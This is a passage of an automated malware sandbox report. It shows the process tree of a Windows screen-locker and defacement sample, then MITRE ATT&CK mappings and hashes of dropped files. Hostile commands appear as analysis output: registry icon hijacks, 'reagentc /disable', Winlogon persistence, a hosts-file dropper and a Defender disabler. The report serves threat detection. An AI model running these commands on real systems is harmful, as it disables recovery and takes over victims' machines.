C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordhtmltemplate\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:60

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordmhtmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:4180

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\Wordpad.Document.1\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
PID:1612

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\wordxmlfile\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\2.ico" /f
11⤵
- Modifies registry class
PID:5996

C:\Windows\system32\reg.exe
reg add "HKEY_CLASSES_ROOT\uTorrent\DefaultIcon" /ve /t REG_SZ /d "C:\java\icons\1.ico" /f
11⤵
- Modifies registry class
PID:2248

C:\Windows\system32\ie4uinit.exe
ie4uinit.exe -show
11⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
PID:6120

C:\Windows\system32\ie4uinit.exe
ie4uinit.exe -show
7⤵
- Modifies Installed Components in the registry
- Registers COM server for autorun
- Modifies Internet Explorer settings
- Modifies registry class
PID:976

C:\java\protection\start\starthosts.exe
C:\java\protection\start\starthosts.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5240

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\85E4.tmp\85E5.tmp\85E6.bat C:\java\protection\start\starthosts.exe"
8⤵
PID:3260

C:\java\ban\hosts.exe
C:\java\ban\hosts.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5588

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\877B.tmp\877C.tmp\877D.bat C:\java\ban\hosts.exe"
10⤵
- Drops file in Drivers directory
PID:4980

C:\java\protection\start\startWPChanger.exe
C:\java\protection\start\startWPChanger.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:284

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\85F4.tmp\85F5.tmp\8606.bat C:\java\protection\start\startWPChanger.exe"
8⤵
PID:2376

C:\java\Wallpaper\WPChanger.exe
C:\java\Wallpaper\WPChanger.exe C:\java\Wallpaper\clown.png
9⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Modifies Control Panel
PID:4316

C:\java\clown.exe
C:\java\clown.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:296

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\85F5.tmp\85F5.tmp\8606.bat C:\java\clown.exe"
8⤵
PID:216

C:\java\protection\start\startvol.exe
C:\java\protection\start\startvol.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:844

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\874D.tmp\874D.tmp\874E.bat C:\java\protection\start\startvol.exe"
10⤵
PID:5376

C:\java\vol.exe
C:\java\vol.exe
11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8DE3.tmp\8DE4.tmp\8DE5.bat C:\java\vol.exe"
12⤵
PID:3384

C:\Windows\system32\wscript.exe
wscript.exe "C:\java\vol.vbs"
13⤵
PID:4340

C:\Windows\system32\wscript.exe
wscript.exe "C:\java\morgalka.vbs"
13⤵
PID:6072

C:\java\protection\start\startScreenBlocker.exe
C:\java\protection\start\startScreenBlocker.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4116

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\873C.tmp\873D.tmp\873E.bat C:\java\protection\start\startScreenBlocker.exe"
10⤵
PID:5872

C:\java\ban\ScreenBlocker.exe
C:\java\ban\ScreenBlocker.exe
11⤵
- Executes dropped EXE
PID:4992

C:\java\protection\start\startcur.exe
C:\java\protection\start\startcur.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5732

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\874E.tmp\875C.tmp\875D.bat C:\java\protection\start\startcur.exe"
10⤵
PID:3080

C:\java\ban\cur.exe
C:\java\ban\cur.exe
11⤵
- Executes dropped EXE
PID:3284

C:\java\attention.exe
C:\java\attention.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5684

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\874C.tmp\874D.tmp\874E.bat C:\java\attention.exe"
10⤵
PID:2888

C:\java\form.exe
C:\java\form.exe
11⤵
- Executes dropped EXE
PID:4360

C:\Windows\system32\timeout.exe
timeout -t 10 -nobreak
11⤵
- Delays execution with timeout.exe
PID:2432

C:\Windows\system32\taskkill.exe
taskkill -f -im form.exe
11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5268

C:\Windows\system32\ReAgentc.exe
reagentc /disable
9⤵
- Drops file in Windows directory
PID:5388

C:\java\protection\start\startWinlog.exe
C:\java\protection\start\startWinlog.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6120

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\899D.tmp\899E.tmp\899F.bat C:\java\protection\start\startWinlog.exe"
10⤵
PID:1592

C:\java\protection\Winlog.exe
C:\java\protection\Winlog.exe
11⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
PID:3744

C:\java\protection\start\startf.exe
C:\java\protection\start\startf.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5028

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8A59.tmp\8A5A.tmp\8A5B.bat C:\java\protection\start\startf.exe"
10⤵
PID:5364

C:\java\f\f.exe
C:\java\f\f.exe
11⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5284

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8F5A.tmp\8F5B.tmp\8F5C.bat C:\java\f\f.exe"
12⤵
PID:1712

C:\java\protection\start\startban.exe
C:\java\protection\start\startban.exe
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1612

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8AC6.tmp\8AC7.tmp\8AC8.bat C:\java\protection\start\startban.exe"
10⤵
PID:3268

C:\java\ban\ban.exe
C:\java\ban\ban.exe
11⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5536

C:\java\ban\ban.exe
C:\java\ban\ban.exe
12⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:888

C:\java\Wallpaper\engine\wp.exe
wp id
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2728

C:\java\Wallpaper\engine\wp.exe
wp run mpv --wid=262986 C:\java\Wallpaper\engine\wallpapers\1.mp4 --loop=inf --player-operation-mode=pseudo-gui --force-window=yes
9⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5876

C:\java\Wallpaper\engine\mpv.com
"C:\java\Wallpaper\engine\mpv.com" "--wid=262986" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
10⤵
- Executes dropped EXE
PID:5560

C:\java\Wallpaper\engine\mpv.exe
"C:\java\Wallpaper\engine\mpv.com" "--wid=262986" "C:\java\Wallpaper\engine\wallpapers\1.mp4" "--loop=inf" "--player-operation-mode=pseudo-gui" "--force-window=yes"
11⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5408

C:\java\hide.exe
C:\java\hide.exe
9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:5576

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
9⤵
- Delays execution with timeout.exe
PID:4904

C:\java\hide.exe
C:\java\hide.exe
9⤵
- Suspicious use of FindShellTrayWindow
PID:5440

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
9⤵
- Delays execution with timeout.exe
PID:3988

C:\java\hide.exe
C:\java\hide.exe
9⤵
- Suspicious use of FindShellTrayWindow
PID:4768

C:\Windows\system32\timeout.exe
timeout -t 20 -nobreak
9⤵
- Delays execution with timeout.exe
PID:4664

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5172

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3ec 0x308
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5328

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Drivers\Driver.exe
Filesize
12KB

MD5
b8e0b450bc3d404c448a55d86619a275

SHA1
7df14af254efb5de24517f34181c32b574e6bfa0

SHA256
8220c8b9fa1c8baea100bd9284ee2f52c4d5b8b1a5142361ceb336cbd385aeca

SHA512
10bbde8dd363258db12414ed038d954747b87f54ed75305ba34b3de4f2910399885f45b1458207953d76361af389b49b89af3df3a2ff09ee795f0c0af844a06e

Download Submit
C:\ProgramData\Drivers\Driver.exe
Filesize
145.7MB

MD5
e5b6348c4a17bc38123b0e281b6c8501

SHA1
81d4a79ad0d0e176b70d2911dfab2476e6593a8a

SHA256
dd889430662551c3d082ca32ed883a3de7203d9c519446153bc95e2d0345695e

SHA512
22440f1b9d27a4befaeb7368ae6ea2aec0f04cd93cf4531b44dce633fe184fc2e1bfc65163730a118791286a9f27a3bb0bb23e2d5ce41b01c3480c7543a1293e

Download Submit
C:\ProgramData\Drivers\curl-ca-bundle.crt
Filesize
210KB

MD5
aa5ac583708ca35225ac2d230f4acb62

SHA1
45bb287f6463b6ffbba91bfbece28e02e1c8b07b

SHA256
08df40e8f528ed283b0e480ba4bcdbfdd2fdcf695a7ada1668243072d80f8b6f

SHA512
91266bcf97d879828c26beba82e15ff73aa676d800e11401da22b0a565e980912222e02e9a9cc7daff7ceddf78309d8fb0adef6a4eaff9cefa73b72a97281bc2

Download Submit
C:\ProgramData\Drivers\curl.exe
Filesize
5.5MB

MD5
28126f24bc9e051aa9667482e597708c

SHA1
c8d0bd1338c4cb5a4e7ab09cffa08987ab1031e1

SHA256
bdc0528f7532a7c5158a039fe771c74e55f3b9672ecaa872a67bbe4d5d96fb77

SHA512
0839c3c2c2536f56c095bb831e0abc00a76a00dde102f19c296040e8a375e16476885edf2d181928f5f91d2c2fbd0d24dffdc1597438cbfcab0586eb5e514a56

Download Submit
C:\ProgramData\Drivers\start.exe
Filesize
86KB

MD5
54a4c63c672cf6f2924076bd007b355b

SHA1
06f70d5bc1f347b0102e5973b932827b8cb18f4c

SHA256
664c0d68341d7bb581fc78d534fdb2c31d465829a847094c4f2ad6adfa03b030

SHA512
34a847b6dcb6ebf2f17cc8c0be8bd160d8693732bf8112612cf5e54e1ad1a794e61b64619f154e37959a1cb0f238705bd63dc078eb7edfe3e04e5c1a81d52a6e

Download Submit
C:\ProgramData\WindowsVersion\7z.exe
Filesize
463KB

MD5
720b2efbdb1dc6bac0e3fe56e75d47b3

SHA1
d6a607cf172d5807be09a75fb3a4de9a9cbbeaf5

SHA256
4a320727a2adddee00dc66ab06e5b330184ddfbf0899a0763b63aa65621f3879

SHA512
fff08803a2508a0569ed146285526dd900a4120a346badba7b34089143330dba168cb7f32dee153b1ccea967c6fcd24fb459ff6908e48fdf2ae619996108afb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
2daa93382bba07cbc40af372d30ec576

SHA1
c5e709dc3e2e4df2ff841fbde3e30170e7428a94

SHA256
1826d2a57b1938c148bf212a47d947ed1bfb26cfc55868931f843ee438117f30

SHA512
65635cb59c81548a9ef8fdb0942331e7f3cd0c30ce1d4dba48aed72dbb27b06511a55d2aeaadfadbbb4b7cb4b2e2772bbabba9603b3f7d9c8b9e4a7fbf3d6b6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize
152B

MD5
ecdc2754d7d2ae862272153aa9b9ca6e

SHA1
c19bed1c6e1c998b9fa93298639ad7961339147d

SHA256
a13d791473f836edcab0e93451ce7b7182efbbc54261b2b5644d319e047a00a7

SHA512
cd4fb81317d540f8b15f1495a381bb6f0f129b8923a7c06e4b5cf777d2625c30304aee6cc68aa20479e08d84e5030b43fbe93e479602400334dfdd7297f702f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
Filesize
261B

MD5
2c2e6472d05e3832905f0ad4a04d21c3

SHA1
007edbf35759af62a5b847ab09055e7d9b86ffcc

SHA256
283d954fa21caa1f3b4aba941b154fab3e626ff27e7b8029f5357872c48cbe03

SHA512
8c4ce1ea02da6ffb7e7041c50528da447d087d9ee3c9f4a8c525d2d856cf48e46f5dd9a1fedd23dd047634e719c8886457f7e7240aa3cc36f1a6216e4c00ee37

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
294952e9005278591d403bbb8a80d943

SHA1
760de1d3b10290d4c4080160f5e6292798de3b12

SHA256
008422aeb6c591dc9edd28bc02ee181e14343934f9b8f3aeab8b4cd51ebe9412

SHA512
313e77e66d2c39098ed4b0aa060f9397a48d701376a0b3bca64d2070f9159c3c19cad3decac5241ea42b2f8804b090808dc371fcde194b2712199df60cc469c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
Filesize
6KB

MD5
e872ead3d116caa603938df7af18c181

SHA1
e3ca932bde038a642756eb2eba2b26e03c69ba83

SHA256
7e3e3fb5e6188ab99315313a15ff6468a8259d17f7ac366ce7270c1595b9aabc

SHA512
fc7c19b32c4704eebda1957c78f3ac8dfe08601f0f96fd50758b491dfe59c366922734515e15e7b6a38bcd8abe6d4c7f256e956673577f4686b5c1b1d42e5e53

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e1fe3023-340b-4e66-8683-1e12267da1fd.tmp
Filesize
5KB

MD5
58a77cca8f1b78069fd81f59e7a9f0fa

SHA1
f292d3d2eb8f3e94de8c2220bd4e75c587a5a9d1

SHA256
f38869be5a3285d87d44fcee101cafe892fe64e9b9db4698b468211b51998862

SHA512
a2b2cd3c08db0547d719385a55e621cec3db68000f4fe8864d5095d1152e1b015c863f1c866dbd2725b733a76cd0b964afa45a6e4fe9b1b7186a9bbd7277f396

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
7fc078cbbe3fa61e59538087b473eb7e

SHA1
954761b4f093126084341a77c93b9f53569d1ba5

SHA256
523c28ef7d71e36549f27b8b20d379f77e563b58c64e3077d11264961bd8bba2

SHA512
25b5baf6acddae3d92bcd9dc6cb69fc97b1aa212e07b353e57031639adf96c91120b2fb988488003450ebd956ab4cbb6d0631c1e2804ac6de3a489effbb56c10

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
dc490ec17680c973df684aac17f1df38

SHA1
3214f5cfd26d178a767998f1027b85ed7d97494c

SHA256
9a6b9aa4388170f776564a6f09abfa31f683a28b4f022a9097ad46c60d9b01b7

SHA512
2643fc7870a1ce1e7c292ffc91075947ca02fe9ec80c31897b2ce45fa32004376df5f50d54163be0d371fd9271b3dd1af3486c514a056bf2ef479f3628844ea8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
Filesize
11KB

MD5
37c5e420f6658befd24e1cba32c81831

SHA1
da581660a43ca2d8fe2ce98481c8e7366ab42ea5

SHA256
1d886bad46078b7abaf692ad1709e51705a80d8a921a5eb9af5c54328deb554b

SHA512
a25d58fff9f5f45c1ed63f330f729c2f14d9fbbabb808f0e30c18afea1ddba76259af9d45b1d1d9d003459110fdc9ee7e39a90a2e718488fd1499e9a0b07f58a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7191.tmp\7192.tmp\7193.bat
Filesize
1KB

MD5
f35d5dc3d2eef598786ff6016105238e

SHA1
26d1a8a81e303d2aa426a24f7ecdd6b30fb3d1c5

SHA256
1d1a5796abee58978db87505157f255327b4572a128ab35eb2501188fe5110ed

SHA512
44b8a22c515d81387746782aaccfdaf2fe7e9ec179b13423752c0d7b5fa857e8857b91cbdd8472084537894edfd64c437753e977816573686349352d55e7326d

Download Submit
C:\Users\Admin\AppData\Local\Temp\72BA.tmp\72BB.tmp\72BC.bat
Filesize
49B

MD5
7a97d3805f41b693617d71918229069d

SHA1
9c8769e9a2c9be7f7790f3106ee1b10e8d293932

SHA256
f15a793c053baa71fe48bbbc3543748581845dfe8cc443c6a6eb8ab636d92ca0

SHA512
6933c213b5ebf3cd0b67f38526b355573c53cae8e9815cc7abb5ef0c67d11f9f5e5f20bf44e48f7fc2d66e8f36121e7c70ad19298adcd2ae8f8dbd6c05cec04e

Download Submit
C:\Users\Admin\AppData\Local\Temp\72BB.tmp\72BB.tmp\72BC.bat
Filesize
36B

MD5
c8d16fa5eca79cce0bea33ba22477141

SHA1
578ac9e788fede1f6363a512f43c4f9e71a29957

SHA256
5d126a3c721ddd91f71927c6eb2bf455ef11a656ef725d811446b01befd72caf

SHA512
1c5f7902158e40c95e346dbbf11284ea4fc0222de21c0975146c446e1bf961b7c6c7a359c9320c74f39bcf8af3daf22cb229c540f9d80889561eeb981bb083bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\72CA.tmp\72CB.tmp\72CC.bat
Filesize
36B

MD5
e281236820ad03b9648065c1bf210126

SHA1
c1187a9ef4bf22a284957eae5849d512a79d8c5e

SHA256
fb1caea97904d7d13c3a3019d0aa02df02c5fc49e0818316b6eb5706b5ccf727

SHA512
cfa59b238e65061dbf857117404e2955f4da30de5e637ea6d8951d1ec164f36c05cca787a6c971722537df6c6e0ab48746f65ac2b257b4fc085b6d8804912a20

Download Submit
C:\Users\Admin\AppData\Local\Temp\72CB.tmp\72CB.tmp\72CC.bat
Filesize
36B

MD5
ff36f63b2f3b24ea8047a12073879142

SHA1
765451fec7c44226f66a7d4f849c3cb1953b6ec3

SHA256
7062a6db5f1eccbf6de6afc2b18944785be20e343a33d2d097cc3fcdc0c646cf

SHA512
c3b19459b961fc8c51634cca7b619d10c2cd389f4da2985589ce7c5bdb8a7ff9e094d02d8a57aac67976d3177688185b288e245ee0a114d94407a1eee869df1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\886A.tmp\886B.tmp\887B.bat
Filesize
210B

MD5
0176ce71bc6de0c51babceabe22e63e5

SHA1
405ce6a835b5c7b7c438e3f7722cdcecf058c0a5

SHA256
81a1723a62187d8d88ffbcbedd8b44dc7e91e1f0f0e1e3847105b30b94ec1bd7

SHA512
b9621bf59c3a5d97f1f026e0c9dc5eda245f60c42f8541f40d2a4e47bfe2fb55a649fcbfcd9d6a22c3f40a9ed213f3409e9f946cbace61cef6d62367b45d114f

Download Submit
C:\Users\Admin\Downloads\Непідтверджений 177208.crdownload
Filesize
3.0MB

MD5
89adc93450933f84d40ba2d07de9f55d

SHA1
3bdbe9c88b36c79ff2f29839993d2622b894f2fd

SHA256
ef10ef6ec96b3afa2b121edbf8cc45735e06842a26d48e55cc1fff42aa665087

SHA512
49b0b71a2865081759890f9414216f3ab9a6b7579f3f0287157b8c89de8dd61da13a1f6ebaf19aa859bd60a373c0a00f036f6bf97357643235cdbada58204720

Download Submit
C:\java\Wallpaper\engine\start2.exe
Filesize
86KB

MD5
ceb359f1ba560f2dbe4b4483a23aa88b

SHA1
df34070d7e4f3c951252edad1e156bfec3d22e25

SHA256
2eaf94c8bdc006a95367acc528afb0fe87a0756e065a83d32ada7e8a83772781

SHA512
1b812b025e6cbff83dd8e5b426cb7c545d6c650ae8bbb8cb8f53bbdcbe65e89e69896e5383dbdcf7a279c9586babc923072cdcc18cc69c026a9350fc8160c2bb

Download Submit
C:\java\ban\cur.exe
Filesize
5KB

MD5
17b935ed6066732a76bed69867702e4b

SHA1
23f28e3374f9d0e03d45843b28468aace138e71c

SHA256
e60353b37f785c77e1063ac44cba792e9ec69f27b1dc9f3b719280d5ce015cc0

SHA512
774ea047cdc5f008df03ad67242df04d630bb962bc99f1ea8974a21baf6a902c7a5d8b8d09d9e5c7d7e46b0378c7baf33bf80fb3e34777cd0958b8fc740d0318

Download Submit
C:\java\ban\key.exe
Filesize
86KB

MD5
042d1569723a1119e3fedf852fdf1331

SHA1
8f3f5e430c5733d89596ca3cfe078a59d6666c01

SHA256
6a42ecc2578461a7b5d9674255628234d4d871f5059f8d45dd1bcc07e3b7ed61

SHA512
1c8f0cee214884938ad2c09481ab23ca1a3ee8bd5586cc52b19651caf39aff12f4f1b493099a373c7a035e4bfacb51c544eb74ca185509977f43498acd50e78b

Download Submit
C:\java\f\save2.bat
Filesize
14B

MD5
d3f65424c7038bb2891b33bfe5d344c5

SHA1
cc8bc2cf90f9320b7c24e183a6561d4f912b1c67

SHA256
09c71b6750942621d35b3b3d3674e3f1dbe104884e0857273f033d3843c34fab

SHA512
8c55a9709679c46175a89a05662673e41d3697383945750469adfedb6d9ff5be72690554cb37ade4c7bbe7bf31fd93f9c1dd02209fcff041f32b6c4ded9efe67

Download Submit
C:\java\protection\DisDef.exe
Filesize
802KB

MD5
ac34ba84a5054cd701efad5dd14645c9

SHA1
dc74a9fd5560b7c7a0fc9d183de9d676e92b9e8b

SHA256
c576f7f55c4c0304b290b15e70a638b037df15c69577cd6263329c73416e490e

SHA512
df491306a3c8ddb580b7cca1dce9e22a87fd43ca3632f3630cdcbe114bef243e847b2ce774d688f6e142516f2e0fc49d30fad7c7168e627523da21e2fe06836a

Download Submit
C:\java\protection\clown.exe
Filesize
87KB

MD5
8a3a2bfdd04511b5d9da8d3f514cee4e

SHA1
e7ee9f989bc20fbe1159898f4e669841a1b13606

SHA256
c27e91dee19f7d3f34f831ec1ae2fb814e89c6d00810d5b5b93960ee36cb589a

SHA512
a630e90943949fdb591b04ed7deee554d84397fa94a2e3730f6bfbecfc7e40ff4f727dfd442e09fe505bc7968ce2c965a9cbf7638a3289f944987dc59427ee56

Download Submit
C:\java\protection\def.exe
Filesize
86KB

MD5
e517f588e9ab0ed950bd3703ed60520a

SHA1
d9e102152743836aec97bda3dc65bbc8a629db7c

SHA256
66e1bbffca0f219d8310234391e252fed853fddfa7def2a82551e0cefec69191

SHA512
33cb61c6f933b225575ec124b79347894b359c513c0551ad4ca50fc36c193f29bf7b905dca161672710951aa4d589df1dea11cc8a49405d31fe26ab47644510e

Download Submit
C:\java\protection\start\startScreenBlocker.exe
Filesize
86KB

MD5
4649e05b2779555875d7ee31c0dc386e

SHA1
acf793eca199d14f6bc2d23d75aa3ab185add848

SHA256
ab8461d095ec2e0f3a02e81f4cd93741e5c1542bc2c3e1438615c6e438e80089

SHA512
5431ef3e405a60e46d54c7209b15ea77306284aa1c75a8f60e6132efee551c48e93ba7e79214a94094a286739de1eeaa12031f4d14bc451de8e247879561be85

Download Submit
C:\java\protection\start\startban.exe
Filesize
86KB

MD5
1dba6915604e5c45dd1217f0e7d46520

SHA1
a1528f01d9c0e514f398923d91079c509685ef4d

SHA256
eea0e13bd96b3368cddbdbab3416bcf730db77d206e4fbbff81b7139c9f3aac3

SHA512
f5b1b3bb452b34a8d6fb85385df02e942d9d85033cf3dc94b7d6da69806235ff51cf0ca2a189f5581a1b6419a974e8d979d67d0a906f510acf16c3e0f5e72f54

Download Submit
C:\java\protection\start\startcur.exe
Filesize
86KB

MD5
1ca1b51ddc00da38b3af79bf67dbf134

SHA1
d483c20c1b72a32ea1b9c4ba2a92b1e724bb4172

SHA256
1e85b020f99409982c31be92f6b37fb6f588d66e505a95b4e97f58477b1d24f7

SHA512
66939d175c9d1df716efaf7d199351b6362106bd97a034a55b6f345937ded2e89ac8d5a8416bd2782783db5df439029dd6ac84ec887743d43d163eee8cb1f4a9

Download Submit
C:\java\protection\start\starthosts.exe
Filesize
86KB

MD5
3e7792a8d26bf121c82612f69c6c272c

SHA1
e08ee5bb3b6911e2fc383a11997dc59ecfc2e028

SHA256
7c04a0332a68b8887c036fe1c494f0a789f22c9cf10037949518633d1285f9a8

SHA512
c49affff4e133e4fbdc826c9ffc05be022d91a48ce864898f8ae68da6a7189ece2c7888267d47118d4c61ac045f1b6e32d153bb40c3641bf543c5b58da307a12

Download Submit
C:\java\protection\start\startkey.exe
Filesize
86KB

MD5
e859bf8fc7ea8724ecaaedaf1b4f136f

SHA1
502a086e87446791f8b382569f502f6f037b74cf

SHA256
33e77612f9eeee61a610f88d5ea45c8f2074b64853914249ae21d151ee031325

SHA512
857643a57302f35fd939251f7362d7bc749cd5076613d157017a628afa13dea7ae9feb401ce12397f69fd0d4d5eac7b79c2b7676456949bc6095d7a8bd5aef86

Download Submit
\??\pipe\LOCAL\crashpad_2016_MIOJCBEHOQKZHEKI
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/236-141-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/236-170-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/1196-200-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/1196-228-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/2680-198-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/2680-168-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/3592-144-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/3592-225-0x00007FF602DD0000-0x00007FF603366000-memory.dmp

Filesize
5.6MB

Download
memory/4316-548-0x0000000000950000-0x0000000000958000-memory.dmp

Filesize
32KB

Download
memory/4316-539-0x000000001B030000-0x000000001B0CC000-memory.dmp

Filesize
624KB

Download
memory/4316-538-0x000000001B6E0000-0x000000001BBAE000-memory.dmp

Filesize
4.8MB

Download
memory/4360-551-0x0000000000590000-0x00000000008C4000-memory.dmp

Filesize
3.2MB

Download
memory/4992-547-0x0000000000770000-0x0000000000778000-memory.dmp

Filesize
32KB

Download
memory/5368-522-0x00000000057D0000-0x0000000005862000-memory.dmp

Filesize
584KB

Download
memory/5368-523-0x00000000057A0000-0x00000000057AA000-memory.dmp

Filesize
40KB

Download
